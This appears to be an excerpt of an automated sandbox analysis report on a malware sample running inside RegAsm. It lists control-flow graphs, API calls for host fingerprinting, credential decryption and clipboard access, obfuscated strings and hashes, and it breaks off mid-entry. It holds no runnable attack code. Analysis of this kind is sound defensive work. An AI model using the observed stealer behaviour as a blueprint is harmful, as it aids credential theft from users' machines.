424beb-424bf2 198->200 203 424c81-424cdc 199->203 201 424bc0-424bc5 200->201 202 424bf4-424c0c 200->202 204 424bca-424bd3 201->204 205 424c40-424c48 202->205 206 424c0e-424c11 202->206 207 424d21-424d2a 203->207 208 424cde-424cdf 203->208 204->198 209 424c7f 204->209 205->204 210 424c4a-424c75 205->210 206->205 211 424c13-424c31 206->211 213 424d4b-424d4e call 42a410 207->213 214 424d2c-424d32 207->214 212 424ce0-424d1f 208->212 209->203 210->204 211->204 212->207 212->212 217 424d53-424d6f 213->217 215 424d40-424d49 214->215 215->213 215->215
          APIs
          • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 0042482D
          • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00424918
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: ComputerName
          • String ID: EU`~$Ym[!$a~g$bfbV
          • API String ID: 3545744682-3885212843
          • Opcode ID: 8ffec7a7b111415739fd8b8748d1524646aa4b3f85a27ce00ca1e0f9c04cf9cc
          • Instruction ID: 69728262e6f982fe4921dbb444f4126da21175e6cce4cd7b8232bab653071d94
          • Opcode Fuzzy Hash: 8ffec7a7b111415739fd8b8748d1524646aa4b3f85a27ce00ca1e0f9c04cf9cc
          • Instruction Fuzzy Hash: 58328A70104B928AD726CF35D494BE3BBE1EF57309F8449ADC0FA8B282C7796446CB59
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 218 424397-4243a8 220 4243f6-4243ff 218->220 221 4243aa-4243be 218->221 222 42444b-42444f 220->222 223 4243c0-4243f2 221->223 224 424401 221->224 225 424450-424459 222->225 223->223 227 4243f4 223->227 226 424403-42440a 224->226 225->225 228 42445b-4244ef 225->228 229 424427-424445 226->229 230 42440c-42441c 226->230 227->226 231 4244f1 228->231 232 424548-424551 228->232 233 424447-424449 229->233 234 42441e-424425 229->234 230->233 230->234 235 424500-424546 231->235 236 424553-424559 232->236 237 42456b-424577 232->237 233->222 233->228 234->222 235->232 235->235 238 424560-424569 236->238 239 42458b-424596 237->239 240 424579-42457f 237->240 238->237 238->238 243 4245a1-42464d call 439830 239->243 244 424598-42459e call 4086d0 239->244 241 424580-424589 240->241 241->239 241->241 250 424698-4246a1 243->250 251 42464f 243->251 244->243 253 4246a3-4246a9 250->253 254 4246bb-4246c7 250->254 252 424650-424696 251->252 252->250 252->252 255 4246b0-4246b9 253->255 256 4246db-42477a call 408740 call 439830 254->256 257 4246c9-4246cf 254->257 255->254 255->255 264 4247b5-4247be 256->264 265 42477c-42477f 256->265 258 4246d0-4246d9 257->258 258->256 258->258 267 4247c0-4247c6 264->267 268 4247db-4247e7 264->268 266 424780-4247b3 265->266 266->264 266->266 269 4247d0-4247d9 267->269 270 4247fb-42486a call 439830 GetComputerNameExA 268->270 271 4247e9-4247ef 268->271 269->268 269->269 275 42486c-42486f 270->275 276 4248bd-4248c6 270->276 272 4247f0-4247f9 271->272 272->270 272->272 279 424870-4248bb 275->279 277 4248db-4248e7 276->277 278 4248c8-4248cf 276->278 281 4248fb-42497c GetComputerNameExA 277->281 282 4248e9-4248ef 277->282 280 4248d0-4248d9 278->280 279->276 279->279 280->277 280->280 284 4249c8-4249d1 281->284 285 42497e-42497f 281->285 283 4248f0-4248f9 282->283 283->281 283->283 287 4249d3-4249d9 284->287 288 4249eb-4249f7 284->288 286 424980-4249c6 285->286 286->284 286->286 289 4249e0-4249e9 287->289 290 424a0b-424a7a 288->290 291 4249f9-4249ff 288->291 289->288 289->289 294 424aa6-424aaf 290->294 295 424a7c-424a7f 290->295 292 424a00-424a09 291->292 292->290 292->292 297 424ab1-424ab7 294->297 298 424acb-424ad7 294->298 296 424a80-424aa4 295->296 296->294 296->296 299 424ac0-424ac9 297->299 300 424aeb-424b54 call 439830 298->300 301 424ad9-424adf 298->301 299->298 299->299 306 424b56 300->306 307 424b8f-424b98 300->307 302 424ae0-424ae9 301->302 302->300 302->302 308 424b60-424b8d 306->308 309 424b9a 307->309 310 424bab-424bb6 307->310 308->307 308->308 311 424ba0-424ba9 309->311 312 424bd9-424be5 310->312 311->310 311->311 313 424c7a-424c7d 312->313 314 424beb-424bf2 312->314 317 424c81-424cdc 313->317 315 424bc0-424bc5 314->315 316 424bf4-424c0c 314->316 318 424bca-424bd3 315->318 319 424c40-424c48 316->319 320 424c0e-424c11 316->320 321 424d21-424d2a 317->321 322 424cde-424cdf 317->322 318->312 323 424c7f 318->323 319->318 324 424c4a-424c75 319->324 320->319 325 424c13-424c31 320->325 327 424d4b-424d4e call 42a410 321->327 328 424d2c-424d32 321->328 326 424ce0-424d1f 322->326 323->317 324->318 325->318 326->321 326->326 331 424d53-424d6f 327->331 329 424d40-424d49 328->329 329->327 329->329
          APIs
          • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 0042482D
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: ComputerName
          • String ID: EU`~$Ym[!$a~g$bfbV
          • API String ID: 3545744682-3885212843
          • Opcode ID: e87d3c24cc64bf4e230b1be3b278c1c3fe91586f2c780097d2b33b0b51f6c8dd
          • Instruction ID: d418c24f432c221ca551667d44ec9dcacf06a5660f0ec3c43e5de7a1289bec2a
          • Opcode Fuzzy Hash: e87d3c24cc64bf4e230b1be3b278c1c3fe91586f2c780097d2b33b0b51f6c8dd
          • Instruction Fuzzy Hash: A4328970104B928AD726CF34D494BE3BBE1EF57309F8449ADC0FA8B282C7796446CB59
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 332 423d4e-424596 334 4245a1-42464d call 439830 332->334 335 424598-42459e call 4086d0 332->335 341 424698-4246a1 334->341 342 42464f 334->342 335->334 344 4246a3-4246a9 341->344 345 4246bb-4246c7 341->345 343 424650-424696 342->343 343->341 343->343 346 4246b0-4246b9 344->346 347 4246db-424709 call 408740 call 439830 345->347 348 4246c9-4246cf 345->348 346->345 346->346 353 42470e-424718 347->353 349 4246d0-4246d9 348->349 349->347 349->349 354 42471b-42477a 353->354 355 4247b5-4247be 354->355 356 42477c-42477f 354->356 358 4247c0-4247c6 355->358 359 4247db-4247e7 355->359 357 424780-4247b3 356->357 357->355 357->357 360 4247d0-4247d9 358->360 361 4247fb-424809 call 439830 359->361 362 4247e9-4247ef 359->362 360->359 360->360 365 42480e-42486a GetComputerNameExA 361->365 363 4247f0-4247f9 362->363 363->361 363->363 366 42486c-42486f 365->366 367 4248bd-4248c6 365->367 370 424870-4248bb 366->370 368 4248db-4248e7 367->368 369 4248c8-4248cf 367->369 372 4248fb-42497c GetComputerNameExA 368->372 373 4248e9-4248ef 368->373 371 4248d0-4248d9 369->371 370->367 370->370 371->368 371->371 375 4249c8-4249d1 372->375 376 42497e-42497f 372->376 374 4248f0-4248f9 373->374 374->372 374->374 378 4249d3-4249d9 375->378 379 4249eb-4249f7 375->379 377 424980-4249c6 376->377 377->375 377->377 380 4249e0-4249e9 378->380 381 424a0b-424a7a 379->381 382 4249f9-4249ff 379->382 380->379 380->380 385 424aa6-424aaf 381->385 386 424a7c-424a7f 381->386 383 424a00-424a09 382->383 383->381 383->383 388 424ab1-424ab7 385->388 389 424acb-424ad7 385->389 387 424a80-424aa4 386->387 387->385 387->387 390 424ac0-424ac9 388->390 391 424aeb-424b54 call 439830 389->391 392 424ad9-424adf 389->392 390->389 390->390 397 424b56 391->397 398 424b8f-424b98 391->398 393 424ae0-424ae9 392->393 393->391 393->393 399 424b60-424b8d 397->399 400 424b9a 398->400 401 424bab-424bb6 398->401 399->398 399->399 402 424ba0-424ba9 400->402 403 424bd9-424be5 401->403 402->401 402->402 404 424c7a-424c7d 403->404 405 424beb-424bf2 403->405 408 424c81-424cdc 404->408 406 424bc0-424bc5 405->406 407 424bf4-424c0c 405->407 409 424bca-424bd3 406->409 410 424c40-424c48 407->410 411 424c0e-424c11 407->411 412 424d21-424d2a 408->412 413 424cde-424cdf 408->413 409->403 414 424c7f 409->414 410->409 415 424c4a-424c75 410->415 411->410 416 424c13-424c31 411->416 418 424d4b-424d4e call 42a410 412->418 419 424d2c-424d32 412->419 417 424ce0-424d1f 413->417 414->408 415->409 416->409 417->412 417->417 422 424d53-424d6f 418->422 420 424d40-424d49 419->420 420->418 420->420
          APIs
          • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 0042482D
          • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00424918
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: ComputerName
          • String ID: EU`~$a~g$|FX8
          • API String ID: 3545744682-4180061646
          • Opcode ID: 213cc440ceb128a710669a4332b4bb9f4753775ce399caefbc0ed4659f138e9e
          • Instruction ID: f8aed6bdad080e1625b4a5ebbf90ed0658a9d14548ebf4ceef77d0f8e075bccd
          • Opcode Fuzzy Hash: 213cc440ceb128a710669a4332b4bb9f4753775ce399caefbc0ed4659f138e9e
          • Instruction Fuzzy Hash: 71226B70204B528AD726CF35D494BE3BBE1AF57308F84496DD0FB8B282D779A406CB59
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 00438EF2
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: AllocateHeap
          • String ID: 0abc
          • API String ID: 1279760036-453689197
          • Opcode ID: 37ffc3c2ed0c3dbd89be3697700adac63ee3700ab6f501dac7975d63c57a81da
          • Instruction ID: a4d295885b04431afa9f200960333666e57fb59a6a5713e9b621406d6bd23278
          • Opcode Fuzzy Hash: 37ffc3c2ed0c3dbd89be3697700adac63ee3700ab6f501dac7975d63c57a81da
          • Instruction Fuzzy Hash: B91116759093409FE710CF14C85475BFBA2EBC9329F14CA5DE8A827285C379D9098BD6
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004156ED
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: CryptDataUnprotect
          • String ID:
          • API String ID: 834300711-0
          • Opcode ID: b204ec16d20fbd2333b2ed89591df08f601e796a1cc2c6ab9427f15c4b00bdab
          • Instruction ID: 465bd4e3c27ab89dba1bc488083db8020046fdec95f0cad9567172be99b224cd
          • Opcode Fuzzy Hash: b204ec16d20fbd2333b2ed89591df08f601e796a1cc2c6ab9427f15c4b00bdab
          • Instruction Fuzzy Hash: 7C81AF71500B41DFD724CF28C481B96B7E2BF99314F18862ED4AA8BB96D738F855CB84
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • LdrInitializeThunk.NTDLL(0043A5D6,005C003F,00000006,00120089,?,00000018,BCBDBEBF,00000000,004143CA), ref: 00435C6D
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: InitializeThunk
          • String ID:
          • API String ID: 2994545307-0
          • Opcode ID: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
          • Instruction ID: 57f1bbd75be791b51c1c69d73521a326315edc5ecdbfadca72035e30f952b94d
          • Opcode Fuzzy Hash: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
          • Instruction Fuzzy Hash: 64E09275508602AFEA05DF45C14050EF7E2BFC8718F55988DE88473604C6B4AD45DA42
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d428f9f994b389fdfcdecf0dc78a1094c7f8f3f872c03c2e8c1e6cec265956e4
          • Instruction ID: b73ec05aeef288813a81dd66e2be210cfb8ea783e98e14abfb85c823c1859eab
          • Opcode Fuzzy Hash: d428f9f994b389fdfcdecf0dc78a1094c7f8f3f872c03c2e8c1e6cec265956e4
          • Instruction Fuzzy Hash: A8F0F2B4508380CFD320EF28C548B8ABBE1ABC8304F41882DE4898B390DB759464CF46
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 37 428ced-428ddb 38 428e25-428e8d SysAllocString 37->38 39 428ddd 37->39 42 428e97-428ec4 38->42 40 428ddf-428e21 39->40 40->40 41 428e23 40->41 41->38
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: AllocString
          • String ID: 0$8$:$A$C$E$Q$S$T$b$m
          • API String ID: 2525500382-3407828523
          • Opcode ID: 2e8d8fbebdaa49853eb8224005bbc4316ed0aa64be6604739f13407a5b1233dc
          • Instruction ID: e95acedcac56ecc68ee65e49bea812364c6230a516d1cc43e77dee9a9291d732
          • Opcode Fuzzy Hash: 2e8d8fbebdaa49853eb8224005bbc4316ed0aa64be6604739f13407a5b1233dc
          • Instruction Fuzzy Hash: A041E47050C7C18ED331CF28C49878BBBE1AB96318F044A5DE4D84B296C7B99649CB93
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 68 41d140-41d1ad 69 41d1af 68->69 70 41d1fe-41d241 RtlExpandEnvironmentStrings 68->70 71 41d1b0-41d1fc 69->71 72 41d243-41d248 70->72 73 41d24a 70->73 71->70 71->71 74 41d24d-41d2cf call 435ab0 RtlExpandEnvironmentStrings 72->74 73->74 77 41d2d1 74->77 78 41d323-41d350 74->78 79 41d2e0-41d321 77->79 80 41d352-41d357 78->80 81 41d359-41d35b 78->81 79->78 79->79 82 41d35e-41d36f call 435ab0 80->82 81->82 85 41d391-41d3a1 82->85 86 41d371-41d376 82->86 88 41d3c1-41d3d2 call 43a5f0 85->88 89 41d3a3-41d3aa 85->89 87 41d380-41d38f 86->87 87->85 87->87 92 41d3d7-41d3f4 88->92 90 41d3b0-41d3bf 89->90 90->88 90->90
          APIs
          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D235
          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D260
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: EnvironmentExpandStrings
          • String ID: 1mo$MM$SK$[[$je
          • API String ID: 237503144-2479076429
          • Opcode ID: 56f0675bc346d04c7b5b066cf92a33d0e8f4a4a3e6ec12b32402b138b2359614
          • Instruction ID: 67733dcc05c02254f284543cbc7364a4b4d848214c874a56ba83c08088485b8d
          • Opcode Fuzzy Hash: 56f0675bc346d04c7b5b066cf92a33d0e8f4a4a3e6ec12b32402b138b2359614
          • Instruction Fuzzy Hash: E761ABB16083518FD324CF14C8A0BABB7E1EFC6318F554A1DE8EA5B280D7789945CB97
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 423 408e40-408e4d call 437160 426 408e51-408e58 call 431fd0 423->426 427 408e4f 423->427 431 408e5a 426->431 432 408e5c-408e8d GetStdHandle ExitProcess call 40a2e0 426->432 428 408ea1-408eaa ExitProcess 427->428 433 408e9a-408e9f call 438dc0 431->433 438 408e91 call 40f400 432->438 439 408e8f 432->439 433->428 442 408e96 438->442 440 408e98 439->440 440->433 442->440
          APIs
          Strings
          • in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified, xrefs: 00408E74
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: ExitProcess
          • String ID: in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified
          • API String ID: 621844428-4175449110
          • Opcode ID: 4661fddd18b9f543c69f4e259dc310f095456cf366bc761fc7612406de73d186
          • Instruction ID: 5aebdcb81b5fd7ae4ac3d30ec8dc0d41ef40b7d55fd6bbb79e29613ba40b90b8
          • Opcode Fuzzy Hash: 4661fddd18b9f543c69f4e259dc310f095456cf366bc761fc7612406de73d186
          • Instruction Fuzzy Hash: 9EF05E7140C210CAC710BB75D70126EBBA06F25328F109A3FE9C2E12D1DF7C8446969F
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041DB3E
          • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 0041DB6D
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: EnvironmentExpandStrings
          • String ID: UW
          • API String ID: 237503144-1530030876
          • Opcode ID: 51a3cc3d20b066d1da223b3fed3b2c550fa9050727f61ebbff16a5535d242d31
          • Instruction ID: 1aaf7c69180608864851868e21b4f2f22e8da6d83f24711d91824ffaf0471347
          • Opcode Fuzzy Hash: 51a3cc3d20b066d1da223b3fed3b2c550fa9050727f61ebbff16a5535d242d31
          • Instruction Fuzzy Hash: DB514EB1108341AFD314DF00D890B5BBBE5EBC6398F108A1DF9A55B380D774E985CB9A
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00433E7C
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: InformationVolume
          • String ID: C$\
          • API String ID: 2039140958-514332402
          • Opcode ID: 00ba4f5d0a26320f58e339930330edb05eddfd77f24e5733e99c389846c8c668
          • Instruction ID: f7852513ce245157cb415b6bfc14ef2ee77568f85ad9ad8f5583f67a4451fe21
          • Opcode Fuzzy Hash: 00ba4f5d0a26320f58e339930330edb05eddfd77f24e5733e99c389846c8c668
          • Instruction Fuzzy Hash: CBF0E579254341BBE718CF10EC16F0A33A49B81704F24882DB246EA2D1C7F0B904CA4C
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042536F
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: InstalledMemoryPhysicallySystem
          • String ID: AODJ
          • API String ID: 3960555810-2067138614
          • Opcode ID: 704642b2d01b6681c0043daa78fb2413d2679f85d8dfb6cacabe66dd70e0d32d
          • Instruction ID: a08f39bb112014f2f1657a94d447c7f30b599b94c0c8f351ef59b3403e6794f9
          • Opcode Fuzzy Hash: 704642b2d01b6681c0043daa78fb2413d2679f85d8dfb6cacabe66dd70e0d32d
          • Instruction Fuzzy Hash: B2F16D70504F528BE726CF35C0647E7BBE1AF16308F48496DC4EB8B692C779A506CB54
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042536F
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: InstalledMemoryPhysicallySystem
          • String ID: AODJ
          • API String ID: 3960555810-2067138614
          • Opcode ID: cc748f89e026e4aa52296d49e17efc31094b57add59ab72c734c32d69b0c0fbc
          • Instruction ID: 0fda6418af78e69ba57df9bcb3992236a43b7b6399a2a26a87244ff26623ea66
          • Opcode Fuzzy Hash: cc748f89e026e4aa52296d49e17efc31094b57add59ab72c734c32d69b0c0fbc
          • Instruction Fuzzy Hash: 82D16C70504F528BE726CF35C0687E7BBE1AF16308F84496EC4EB8B692C779A506CB54
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00414809
          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00414838
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: EnvironmentExpandStrings
          • String ID:
          • API String ID: 237503144-0
          • Opcode ID: 220dc30ddd408f96ec77eb45417a19a1ffca7041cdf55e136762cbfd1b2d9bde
          • Instruction ID: 7dcc9c6cdf66f0fd58bb55d9f59981dd19f82d8293439122bf3b1d75ada9596e
          • Opcode Fuzzy Hash: 220dc30ddd408f96ec77eb45417a19a1ffca7041cdf55e136762cbfd1b2d9bde
          • Instruction Fuzzy Hash: 96716BB4900B009FD334DF29C856BA3BBE5FB49310F044A1DE9AB8B791E774A4458B96
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • RtlAllocateHeap.NTDLL(?,00000000,FFFFFFFF), ref: 00438792
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: AllocateHeap
          • String ID:
          • API String ID: 1279760036-0
          • Opcode ID: f15e1859f4525b3c50a04a2710c5d1f37ec115bfaff45a60f83541cf4b0acc47
          • Instruction ID: a75c113e4f765b9b5993dcce8f983539bd3cb48dbbdcc8a6ccca6852859b9d7e
          • Opcode Fuzzy Hash: f15e1859f4525b3c50a04a2710c5d1f37ec115bfaff45a60f83541cf4b0acc47
          • Instruction Fuzzy Hash: 50214C352183409FD318CF10C8A0B6BF7E2EBCA324F659A1DF89647791C7749806CB86
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • RtlAllocateHeap.NTDLL(?,00000000,004099FB), ref: 00435B52
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: AllocateHeap
          • String ID:
          • API String ID: 1279760036-0
          • Opcode ID: 37ea91a0811c95d40b2cb9f8293c2b99a71fc6676d7c6db9284bae4006a5d230
          • Instruction ID: 4d35b39fb30f58a15e8b4261a445f7b9a7268aef18239ad64b196b65f77c7a0f
          • Opcode Fuzzy Hash: 37ea91a0811c95d40b2cb9f8293c2b99a71fc6676d7c6db9284bae4006a5d230
          • Instruction Fuzzy Hash: DF116D312087059FD718CF14C8A4B9FFBA6FBC5328F148A1DE8A517691C775A90ACBD2
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • RtlFreeHeap.NTDLL(?,00000000,?), ref: 00435C25
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: FreeHeap
          • String ID:
          • API String ID: 3298025750-0
          • Opcode ID: 47609bdb75ff9a0bd9befa6bcdb2ded7c72d3fabf37161c47dd5ec7f30a64e57
          • Instruction ID: 8bc72e464bb8c67856a86a855d011e9863e9759b98bb0498aed1e28e5184cafa
          • Opcode Fuzzy Hash: 47609bdb75ff9a0bd9befa6bcdb2ded7c72d3fabf37161c47dd5ec7f30a64e57
          • Instruction Fuzzy Hash: 37117335A0A7C08FE3178B249C50585BB72EF5732472D82DFC4998B553C238691ECB61
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: LibraryLoad
          • String ID:
          • API String ID: 1029625771-0
          • Opcode ID: 8a96e1facb4f4dbc7f71337e122414cd4cbbfe655965e7e7416224cc8a7c2ccf
          • Instruction ID: 4e7ffbd948481661c6ae6d36eb25790ea1520d4cfae2f519e16c3e2f66907490
          • Opcode Fuzzy Hash: 8a96e1facb4f4dbc7f71337e122414cd4cbbfe655965e7e7416224cc8a7c2ccf
          • Instruction Fuzzy Hash: D211DDB051D3819BD709DF04C5A871EBBE2FFD9718F245E1CE1D21B2A0C77A85458B8A
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: Clipboard$CloseDataInfoOpenWindow
          • String ID: #$#$%$*$+$-$8$>$w
          • API String ID: 2278096442-1308166566
          • Opcode ID: 9e8195ee21946f00d04abc4bf74c4716ac4220f48f77454d7dab7f858fbfbfcc
          • Instruction ID: 6dabd5ff6e4084959593b92fb4858d06eb42fb658209fef43edfe3ca8a1cba98
          • Opcode Fuzzy Hash: 9e8195ee21946f00d04abc4bf74c4716ac4220f48f77454d7dab7f858fbfbfcc
          • Instruction Fuzzy Hash: 1A61A0B4A08740CFD710DF29E485716BBF0AB56314F548A9ED8868F785C379E806CBA6
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: Object$DeleteMetricsSelectSystem
          • String ID:
          • API String ID: 3911056724-3916222277
          • Opcode ID: 6b3adec5283382c8998b18e9f52674ae7d030fe91863da167dc2bc584f9db1ba
          • Instruction ID: 1817ff47aa5ca451eab720458ac1642dca2340dc9b3192ca43a4c8fc496406f6
          • Opcode Fuzzy Hash: 6b3adec5283382c8998b18e9f52674ae7d030fe91863da167dc2bc584f9db1ba
          • Instruction Fuzzy Hash: A7517CB4505B408FC360EF69D685A1ABBF0BB98300F419A2DE89AC7B60D734F845CF46
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: ExitProcess
          • String ID: 8C$C
          • API String ID: 621844428-4036777611
          • Opcode ID: b2e6b163f8770e3269f9a79d93b763158bbaf9e878ab14013538e5446b449ee5
          • Instruction ID: 5314f597a3064ada1ecc355464a4679b2ff7ffcd65b18285bae9cdd45f145242
          • Opcode Fuzzy Hash: b2e6b163f8770e3269f9a79d93b763158bbaf9e878ab14013538e5446b449ee5
          • Instruction Fuzzy Hash: 56916F70508B808FD329CF29C494B12BFE2AF56314F19869DD4DA4F7E2C779A409CB96
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
